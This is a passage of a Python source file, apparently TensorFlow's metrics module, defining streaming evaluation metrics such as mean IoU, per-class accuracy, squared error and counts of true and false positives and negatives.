  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_absolute_error is not supported '
                       'when eager execution is enabled.')
  predictions, labels, weights = _remove_squeezable_dimensions(
      predictions=predictions, labels=labels, weights=weights)
  abs_diffs = math_ops.abs(predictions - labels)
  return mean(abs_diffs, weights, metrics_collections, updates_collections,
              name or 'mean_absolute_error')
@tf_export('metrics.mean_cosine_distance')
def mean_cosine_distance(labels,
                         predictions,
                         dim,
                         weights=None,
                         metrics_collections=None,
                         updates_collections=None,
                         name=None):
  """Computes the cosine distance between the labels and predictions.

  Two local variables, `total` and `count`, accumulate the (optionally
  `weights`-weighted) cosine similarity along `dim`; the metric reported is
  `1 - total / count`, an idempotent value. The returned `update_op` folds a
  new batch into the accumulators for streaming estimation.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of arbitrary shape.
    predictions: A `Tensor` of the same shape as `labels`.
    dim: The dimension along which the cosine distance is computed.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`. Dimension `dim` must be `1`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric
      update ops should be added to.
    name: An optional variable_scope name.

  Returns:
    mean_distance: A `Tensor` representing the current mean cosine distance.
    update_op: An operation that increments the `total` and `count`
      variables appropriately.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_cosine_distance is not supported when '
                       'eager execution is enabled.')
  predictions, labels, weights = _remove_squeezable_dimensions(
      predictions=predictions, labels=labels, weights=weights)
  # Dot product along `dim` — this assumes the inputs are unit-normalized,
  # so the reduced sum is the cosine similarity.
  similarity = math_ops.reduce_sum(
      math_ops.multiply(predictions, labels),
      reduction_indices=[dim],
      keepdims=True)
  mean_distance, update_op = mean(similarity, weights, None, None,
                                  name or 'mean_cosine_distance')
  # Distance = 1 - similarity, applied to both the value and the update op.
  mean_distance = math_ops.subtract(1.0, mean_distance)
  update_op = math_ops.subtract(1.0, update_op)
  if metrics_collections:
    ops.add_to_collections(metrics_collections, mean_distance)
  if updates_collections:
    ops.add_to_collections(updates_collections, update_op)
  return mean_distance, update_op
@tf_export('metrics.mean_per_class_accuracy')
def mean_per_class_accuracy(labels,
                            predictions,
                            num_classes,
                            weights=None,
                            metrics_collections=None,
                            updates_collections=None,
                            name=None):
  """Calculates the mean of the per-class accuracies.

  Calculates the accuracy for each class, then takes the mean of that.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates the accuracy of each class and returns
  them.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    labels: A `Tensor` of ground truth labels with shape [batch size] and of
      type `int32` or `int64`. The tensor will be flattened if its rank > 1.
    predictions: A `Tensor` of prediction results for semantic labels, whose
      shape is [batch size] and type `int32` or `int64`. The tensor will be
      flattened if its rank > 1.
    num_classes: The possible number of labels the prediction task can
      have. This value must be provided, since two variables with shape =
      [num_classes] will be allocated.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that
      `mean_per_class_accuracy'
      should be added to.
    updates_collections: An optional list of collections `update_op` should be
      added to.
    name: An optional variable_scope name.

  Returns:
    mean_accuracy: A `Tensor` representing the mean per class accuracy.
    update_op: An operation that updates the accuracy tensor.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_per_class_accuracy is not supported '
                       'when eager execution is enabled.')
  with variable_scope.variable_scope(name, 'mean_accuracy',
                                     (predictions, labels, weights)):
    labels = math_ops.to_int64(labels)
    # Flatten the input if its rank > 1.
    if labels.get_shape().ndims > 1:
      labels = array_ops.reshape(labels, [-1])
    if predictions.get_shape().ndims > 1:
      predictions = array_ops.reshape(predictions, [-1])
    # Check if shape is compatible.
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())
    # `total[c]` accumulates the (weighted) number of examples of class c;
    # `count[c]` accumulates the (weighted) number of correct predictions.
    total = metric_variable([num_classes], dtypes.float32, name='total')
    count = metric_variable([num_classes], dtypes.float32, name='count')
    # One per-example increment for the class-occurrence accumulator.
    ones = array_ops.ones([array_ops.size(labels)], dtypes.float32)
    if labels.dtype != predictions.dtype:
      predictions = math_ops.cast(predictions, labels.dtype)
    # 1.0 where the prediction matches the label, else 0.0.
    is_correct = math_ops.to_float(math_ops.equal(predictions, labels))
    if weights is not None:
      if weights.get_shape().ndims > 1:
        weights = array_ops.reshape(weights, [-1])
      weights = math_ops.to_float(weights)
      # Weight both accumulators so masked examples (weight 0) drop out of
      # numerator and denominator alike.
      is_correct *= weights
      ones *= weights
    # Scatter each example's contribution into its label's slot.
    update_total_op = state_ops.scatter_add(total, labels, ones)
    update_count_op = state_ops.scatter_add(count, labels, is_correct)

    def compute_mean_accuracy(_, count, total):
      # Per-class accuracy = correct / seen; _safe_div yields 0 for classes
      # never seen, then the unweighted mean over classes is taken.
      per_class_accuracy = _safe_div(
          count, math_ops.maximum(total, 0), name=None)
      mean_accuracy_v = math_ops.reduce_mean(
          per_class_accuracy, name='mean_accuracy')
      return mean_accuracy_v

    mean_accuracy_v = _aggregate_across_replicas(
        metrics_collections, compute_mean_accuracy, count, total)

    # The update op returns the per-class accuracies after this batch.
    update_op = _safe_div(update_count_op,
                          math_ops.maximum(update_total_op, 0),
                          name='update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)

    return mean_accuracy_v, update_op
@tf_export('metrics.mean_iou')
def mean_iou(labels,
             predictions,
             num_classes,
             weights=None,
             metrics_collections=None,
             updates_collections=None,
             name=None):
  """Calculate per-step mean Intersection-Over-Union (mIOU).

  Mean Intersection-Over-Union is a common evaluation metric for
  semantic image segmentation, which first computes the IOU for each
  semantic class and then computes the average over classes.
  IOU is defined as follows:
    IOU = true_positive / (true_positive + false_positive + false_negative).
  The predictions are accumulated in a confusion matrix, weighted by `weights`,
  and mIOU is then calculated from it.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `mean_iou`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    labels: A `Tensor` of ground truth labels with shape [batch size] and of
      type `int32` or `int64`. The tensor will be flattened if its rank > 1.
    predictions: A `Tensor` of prediction results for semantic labels, whose
      shape is [batch size] and type `int32` or `int64`. The tensor will be
      flattened if its rank > 1.
    num_classes: The possible number of labels the prediction task can
      have. This value must be provided, since a confusion matrix of
      dimension = [num_classes, num_classes] will be allocated.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `labels` dimension).
    metrics_collections: An optional list of collections that `mean_iou`
      should be added to.
    updates_collections: An optional list of collections `update_op` should be
      added to.
    name: An optional variable_scope name.

  Returns:
    mean_iou: A `Tensor` representing the mean intersection-over-union.
    update_op: An operation that increments the confusion matrix.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_iou is not supported when '
                       'eager execution is enabled.')
  with variable_scope.variable_scope(name, 'mean_iou',
                                     (predictions, labels, weights)):
    # Check if shape is compatible.
    predictions.get_shape().assert_is_compatible_with(labels.get_shape())

    # Accumulate a [num_classes, num_classes] confusion matrix across batches.
    total_cm, update_op = _streaming_confusion_matrix(labels, predictions,
                                                      num_classes, weights)

    def compute_mean_iou(_, total_cm):
      """Compute the mean intersection-over-union via the confusion matrix."""
      # Row sums = predicted-class totals; column sums = label-class totals;
      # diagonal = true positives per class.
      sum_over_row = math_ops.to_float(math_ops.reduce_sum(total_cm, 0))
      sum_over_col = math_ops.to_float(math_ops.reduce_sum(total_cm, 1))
      cm_diag = math_ops.to_float(array_ops.diag_part(total_cm))
      # Union per class: TP + FP + FN (TP counted once after subtraction).
      denominator = sum_over_row + sum_over_col - cm_diag

      # The mean is only computed over classes that appear in the
      # label or prediction tensor. If the denominator is 0, we need to
      # ignore the class.
      num_valid_entries = math_ops.reduce_sum(
          math_ops.cast(
              math_ops.not_equal(denominator, 0), dtype=dtypes.float32))

      # If the value of the denominator is 0, set it to 1 to avoid
      # zero division.
      denominator = array_ops.where(
          math_ops.greater(denominator, 0), denominator,
          array_ops.ones_like(denominator))

      iou = math_ops.div(cm_diag, denominator)

      # If the number of valid entries is 0 (no classes) we return 0.
      result = array_ops.where(
          math_ops.greater(num_valid_entries, 0),
          math_ops.reduce_sum(iou, name='mean_iou') / num_valid_entries, 0)
      return result

    # TODO(priyag): Use outside_compilation if in TPU context.
    mean_iou_v = _aggregate_across_replicas(
        metrics_collections, compute_mean_iou, total_cm)

    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)

    return mean_iou_v, update_op
@tf_export('metrics.mean_relative_error')
def mean_relative_error(labels,
                        predictions,
                        normalizer,
                        weights=None,
                        metrics_collections=None,
                        updates_collections=None,
                        name=None):
  """Computes the mean relative error by normalizing with the given values.

  Two local variables, `total` and `count`, accumulate the (optionally
  `weights`-weighted) relative errors `|labels - predictions| / normalizer`;
  elements where `normalizer` is exactly zero contribute an error of zero.
  The metric value is the idempotent ratio `total / count`; the returned
  `update_op` folds a new batch into both accumulators for streaming
  estimation of the `mean_relative_error`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    normalizer: A `Tensor` of the same shape as `predictions`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that
      `mean_relative_error` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean_relative_error: A `Tensor` representing the current `total / count`.
    update_op: An operation that increments `total` and `count` and whose
      value matches `mean_relative_error`.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_relative_error is not supported when '
                       'eager execution is enabled.')
  predictions, labels, weights = _remove_squeezable_dimensions(
      predictions=predictions, labels=labels, weights=weights)
  predictions, normalizer = confusion_matrix.remove_squeezable_dimensions(
      predictions, normalizer)
  predictions.get_shape().assert_is_compatible_with(normalizer.get_shape())
  # Where the normalizer is zero, report a relative error of zero rather
  # than dividing by zero.
  normalized = math_ops.div(math_ops.abs(labels - predictions), normalizer)
  relative_errors = array_ops.where(
      math_ops.equal(normalizer, 0.0), array_ops.zeros_like(labels),
      normalized)
  return mean(relative_errors, weights, metrics_collections,
              updates_collections, name or 'mean_relative_error')
@tf_export('metrics.mean_squared_error')
def mean_squared_error(labels,
                       predictions,
                       weights=None,
                       metrics_collections=None,
                       updates_collections=None,
                       name=None):
  """Computes the mean squared error between the labels and predictions.

  Two local variables, `total` and `count`, accumulate the (optionally
  `weights`-weighted) element-wise squared differences between `predictions`
  and `labels`. The metric value is the idempotent ratio `total / count`;
  the returned `update_op` folds a new batch into both accumulators for
  streaming estimation.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` of the same shape as `predictions`.
    predictions: A `Tensor` of arbitrary shape.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that
      `mean_squared_error` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean_squared_error: A `Tensor` representing the current `total / count`.
    update_op: An operation that increments `total` and `count` and whose
      value matches `mean_squared_error`.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_squared_error is not supported when '
                       'eager execution is enabled.')
  predictions, labels, weights = _remove_squeezable_dimensions(
      predictions=predictions, labels=labels, weights=weights)
  squared_diffs = math_ops.square(labels - predictions)
  return mean(squared_diffs, weights, metrics_collections,
              updates_collections, name or 'mean_squared_error')
@tf_export('metrics.mean_tensor')
def mean_tensor(values,
                weights=None,
                metrics_collections=None,
                updates_collections=None,
                name=None):
  """Computes the element-wise (weighted) mean of the given tensors.

  In contrast to the `mean` function which returns a scalar with the
  mean, this function returns an average tensor with the same shape as the
  input tensors.

  The `mean_tensor` function creates two local variables,
  `total_tensor` and `count_tensor` that are used to compute the average of
  `values`. This average is ultimately returned as `mean` which is an idempotent
  operation that simply divides `total` by `count`.

  For estimation of the metric over a stream of data, the function creates an
  `update_op` operation that updates these variables and returns the `mean`.
  `update_op` increments `total` with the reduced sum of the product of `values`
  and `weights`, and it increments `count` with the reduced sum of `weights`.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    values: A `Tensor` of arbitrary dimensions.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `values` dimension).
    metrics_collections: An optional list of collections that `mean`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    mean: A float `Tensor` representing the current mean, the value of `total`
      divided by `count`.
    update_op: An operation that increments the `total` and `count` variables
      appropriately and whose value matches `mean_value`.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.mean_tensor is not supported when '
                       'eager execution is enabled.')
  with variable_scope.variable_scope(name, 'mean', (values, weights)):
    values = math_ops.to_float(values)
    # Accumulators have the same static shape as `values`: element-wise
    # running sum and element-wise (weighted) observation count.
    total = metric_variable(
        values.get_shape(), dtypes.float32, name='total_tensor')
    count = metric_variable(
        values.get_shape(), dtypes.float32, name='count_tensor')

    num_values = array_ops.ones_like(values)
    if weights is not None:
      values, _, weights = _remove_squeezable_dimensions(
          predictions=values, labels=None, weights=weights)
      weights = weights_broadcast_ops.broadcast_weights(
          math_ops.to_float(weights), values)
      # Scale both the summed values and the per-element counts so that
      # weight-0 entries drop out of numerator and denominator alike.
      values = math_ops.multiply(values, weights)
      num_values = math_ops.multiply(num_values, weights)

    update_total_op = state_ops.assign_add(total, values)
    # Ensure any weight validation embedded in `values` runs before the
    # count is updated, so the two accumulators never diverge.
    with ops.control_dependencies([values]):
      update_count_op = state_ops.assign_add(count, num_values)

    compute_mean = lambda _, t, c: _safe_div(
        t, math_ops.maximum(c, 0), name='value')

    mean_t = _aggregate_across_replicas(
        metrics_collections, compute_mean, total, count)

    update_op = _safe_div(update_total_op,
                          math_ops.maximum(update_count_op, 0),
                          name='update_op')
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)

    return mean_t, update_op
@tf_export('metrics.percentage_below')
def percentage_below(values,
                     threshold,
                     weights=None,
                     metrics_collections=None,
                     updates_collections=None,
                     name=None):
  """Computes the percentage of values less than the given threshold.

  Two local variables, `total` and `count`, accumulate the (optionally
  `weights`-weighted) fraction of `values` strictly below `threshold`. The
  metric value is the idempotent ratio `total / count`; the returned
  `update_op` folds a new batch into both accumulators for streaming
  estimation.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    values: A numeric `Tensor` of arbitrary size.
    threshold: A scalar threshold.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and broadcastable to `values`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric
      update ops should be added to.
    name: An optional variable_scope name.

  Returns:
    percentage: A `Tensor` representing the current `total / count`.
    update_op: An operation that increments the `total` and `count`
      variables appropriately.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match
      `values`, or if either collections argument is not a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.percentage_below is not supported when '
                       'eager execution is enabled.')
  # 1.0 where the value is strictly below the threshold, 0.0 elsewhere;
  # the streaming mean of this indicator is the desired percentage.
  below_indicator = math_ops.to_float(math_ops.less(values, threshold))
  return mean(below_indicator, weights, metrics_collections,
              updates_collections, name or 'percentage_below_threshold')
def _count_condition(values,
                     weights=None,
                     metrics_collections=None,
                     updates_collections=None):
  """Sums the weights of cases where the given values are True.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask values.

  Args:
    values: A `bool` `Tensor` of arbitrary size.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `values`, and must be broadcastable to `values` (i.e., all dimensions must
      be either `1`, or the same as the corresponding `values` dimension).
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.

  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.

  Raises:
    ValueError: If `weights` is not `None` and its shape doesn't match `values`,
      or if either `metrics_collections` or `updates_collections` are not a list
      or tuple.
  """
  # Reject non-boolean inputs early; the caller is expected to cast.
  check_ops.assert_type(values, dtypes.bool)
  # Scalar local variable holding the running (weighted) count.
  count = metric_variable([], dtypes.float32, name='count')

  values = math_ops.to_float(values)
  if weights is not None:
    # Validate the weight rank before multiplying, so a bad `weights`
    # surfaces as an error rather than silent broadcasting.
    with ops.control_dependencies((check_ops.assert_rank_in(
        weights, (0, array_ops.rank(values))),)):
      weights = math_ops.to_float(weights)
      values = math_ops.multiply(values, weights)

  value_tensor = _aggregate_variable(count, metrics_collections)

  update_op = state_ops.assign_add(count, math_ops.reduce_sum(values))
  if updates_collections:
    ops.add_to_collections(updates_collections, update_op)

  return value_tensor, update_op
@tf_export('metrics.false_negatives')
def false_negatives(labels,
                    predictions,
                    weights=None,
                    metrics_collections=None,
                    updates_collections=None,
                    name=None):
  """Computes the total number of false negatives.

  Accumulates the (optionally `weights`-weighted) count of cases where the
  label is True but the prediction is False.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: The predicted values, a `Tensor` of arbitrary dimensions.
      Will be cast to `bool`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric
      update ops should be added to.
    name: An optional variable_scope name.

  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.false_negatives is not supported when '
                       'eager execution is enabled.')
  with variable_scope.variable_scope(name, 'false_negatives',
                                     (predictions, labels, weights)):
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=math_ops.cast(predictions, dtype=dtypes.bool),
        labels=math_ops.cast(labels, dtype=dtypes.bool),
        weights=weights)
    # A false negative is a positive label paired with a negative prediction.
    missed_positive = math_ops.logical_and(
        math_ops.equal(labels, True), math_ops.equal(predictions, False))
    return _count_condition(missed_positive, weights, metrics_collections,
                            updates_collections)
@tf_export('metrics.false_negatives_at_thresholds')
def false_negatives_at_thresholds(labels,
                                  predictions,
                                  thresholds,
                                  weights=None,
                                  metrics_collections=None,
                                  updates_collections=None,
                                  name=None):
  """Computes false negatives at provided threshold values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` whose shape matches `predictions`. Will be cast to
      `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose
      values are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that
      `false_negatives` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    false_negatives: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that updates the `false_negatives` variable and
      returns its current value.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.false_negatives_at_thresholds is not '
                       'supported when eager execution is enabled.')
  with variable_scope.variable_scope(name, 'false_negatives',
                                     (predictions, labels, weights)):
    # Only the 'fn' slot of the confusion matrix is needed here.
    cm_values, cm_update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights=weights, includes=('fn',))
    fn_value = _aggregate_variable(cm_values['fn'], metrics_collections)
    fn_update_op = cm_update_ops['fn']
    if updates_collections:
      ops.add_to_collections(updates_collections, fn_update_op)
    return fn_value, fn_update_op
@tf_export('metrics.false_positives')
def false_positives(labels,
                    predictions,
                    weights=None,
                    metrics_collections=None,
                    updates_collections=None,
                    name=None):
  """Sum the weights of false positives.

  Accumulates the (optionally `weights`-weighted) count of cases where the
  label is False but the prediction is True.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: The predicted values, a `Tensor` of arbitrary dimensions.
      Will be cast to `bool`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric
      update ops should be added to.
    name: An optional variable_scope name.

  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.false_positives is not supported when '
                       'eager execution is enabled.')
  with variable_scope.variable_scope(name, 'false_positives',
                                     (predictions, labels, weights)):
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=math_ops.cast(predictions, dtype=dtypes.bool),
        labels=math_ops.cast(labels, dtype=dtypes.bool),
        weights=weights)
    # A false positive is a negative label paired with a positive prediction.
    spurious_positive = math_ops.logical_and(
        math_ops.equal(labels, False), math_ops.equal(predictions, True))
    return _count_condition(spurious_positive, weights, metrics_collections,
                            updates_collections)
@tf_export('metrics.false_positives_at_thresholds')
def false_positives_at_thresholds(labels,
                                  predictions,
                                  thresholds,
                                  weights=None,
                                  metrics_collections=None,
                                  updates_collections=None,
                                  name=None):
  """Computes false positives at provided threshold values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` whose shape matches `predictions`. Will be cast to
      `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose
      values are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and broadcastable to `labels`.
    metrics_collections: An optional list of collections that
      `false_positives` should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    false_positives: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that updates the `false_positives` variable and
      returns its current value.

  Raises:
    ValueError: If shapes mismatch, or if either collections argument is not
      a list or tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.false_positives_at_thresholds is not '
                       'supported when eager execution is enabled.')
  with variable_scope.variable_scope(name, 'false_positives',
                                     (predictions, labels, weights)):
    # Only the 'fp' slot of the confusion matrix is needed here.
    cm_values, cm_update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights=weights, includes=('fp',))
    fp_value = _aggregate_variable(cm_values['fp'], metrics_collections)
    fp_update_op = cm_update_ops['fp']
    if updates_collections:
      ops.add_to_collections(updates_collections, fp_update_op)
    return fp_value, fp_update_op
@tf_export('metrics.true_negatives')
def true_negatives(labels,
                   predictions,
                   weights=None,
                   metrics_collections=None,
                   updates_collections=None,
                   name=None):
  """Sum the weights of true_negatives.

  A true negative is an entry where both `labels` and `predictions` are
  `False`. If `weights` is `None`, weights default to 1. Use weights of 0 to
  mask values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
      be cast to `bool`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
    name: An optional variable_scope name.

  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.true_negatives is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'true_negatives',
                                     (predictions, labels, weights)):
    bool_predictions = math_ops.cast(predictions, dtype=dtypes.bool)
    bool_labels = math_ops.cast(labels, dtype=dtypes.bool)
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=bool_predictions, labels=bool_labels, weights=weights)
    # A true negative: both label and prediction are False.
    tn_mask = math_ops.logical_and(
        math_ops.equal(labels, False), math_ops.equal(predictions, False))
    return _count_condition(tn_mask, weights, metrics_collections,
                            updates_collections)
@tf_export('metrics.true_negatives_at_thresholds')
def true_negatives_at_thresholds(labels,
                                 predictions,
                                 thresholds,
                                 weights=None,
                                 metrics_collections=None,
                                 updates_collections=None,
                                 name=None):
  """Computes true negatives at provided threshold values.

  If `weights` is `None`, weights default to 1. Use weights of 0 to mask
  values.

  Args:
    labels: A `Tensor` whose shape matches `predictions`. Will be cast to
      `bool`.
    predictions: A floating point `Tensor` of arbitrary shape and whose values
      are in the range `[0, 1]`.
    thresholds: A python list or tuple of float thresholds in `[0, 1]`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that `true_negatives`
      should be added to.
    updates_collections: An optional list of collections that `update_op`
      should be added to.
    name: An optional variable_scope name.

  Returns:
    true_negatives: A float `Tensor` of shape `[len(thresholds)]`.
    update_op: An operation that updates the `true_negatives` variable and
      returns its current value.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.true_negatives_at_thresholds is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'true_negatives',
                                     (predictions, labels, weights)):
    # Only the 'tn' entry of the confusion matrix is needed here.
    values, update_ops = _confusion_matrix_at_thresholds(
        labels, predictions, thresholds, weights=weights, includes=('tn',))
    update_op = update_ops['tn']
    tn_value = _aggregate_variable(values['tn'], metrics_collections)
    if updates_collections:
      ops.add_to_collections(updates_collections, update_op)
    return tn_value, update_op
@tf_export('metrics.true_positives')
def true_positives(labels,
                   predictions,
                   weights=None,
                   metrics_collections=None,
                   updates_collections=None,
                   name=None):
  """Sum the weights of true_positives.

  A true positive is an entry where both `labels` and `predictions` are
  `True`. If `weights` is `None`, weights default to 1. Use weights of 0 to
  mask values.

  Args:
    labels: The ground truth values, a `Tensor` whose dimensions must match
      `predictions`. Will be cast to `bool`.
    predictions: The predicted values, a `Tensor` of arbitrary dimensions. Will
      be cast to `bool`.
    weights: Optional `Tensor` whose rank is either 0, or the same rank as
      `labels`, and must be broadcastable to `labels`.
    metrics_collections: An optional list of collections that the metric
      value variable should be added to.
    updates_collections: An optional list of collections that the metric update
      ops should be added to.
    name: An optional variable_scope name.

  Returns:
    value_tensor: A `Tensor` representing the current value of the metric.
    update_op: An operation that accumulates the error from a batch of data.

  Raises:
    ValueError: If `predictions` and `labels` have mismatched shapes, or if
      `weights` is not `None` and its shape doesn't match `predictions`, or if
      either `metrics_collections` or `updates_collections` are not a list or
      tuple.
    RuntimeError: If eager execution is enabled.
  """
  if context.executing_eagerly():
    raise RuntimeError('tf.metrics.true_positives is not '
                       'supported when eager execution is enabled.')

  with variable_scope.variable_scope(name, 'true_positives',
                                     (predictions, labels, weights)):
    bool_predictions = math_ops.cast(predictions, dtype=dtypes.bool)
    bool_labels = math_ops.cast(labels, dtype=dtypes.bool)
    predictions, labels, weights = _remove_squeezable_dimensions(
        predictions=bool_predictions, labels=bool_labels, weights=weights)
    # A true positive: both label and prediction are True.
    tp_mask = math_ops.logical_and(
        math_ops.equal(labels, True), math_ops.equal(predictions, True))
    return _count_condition(tp_mask, weights, metrics_collections,
                            updates_collections)
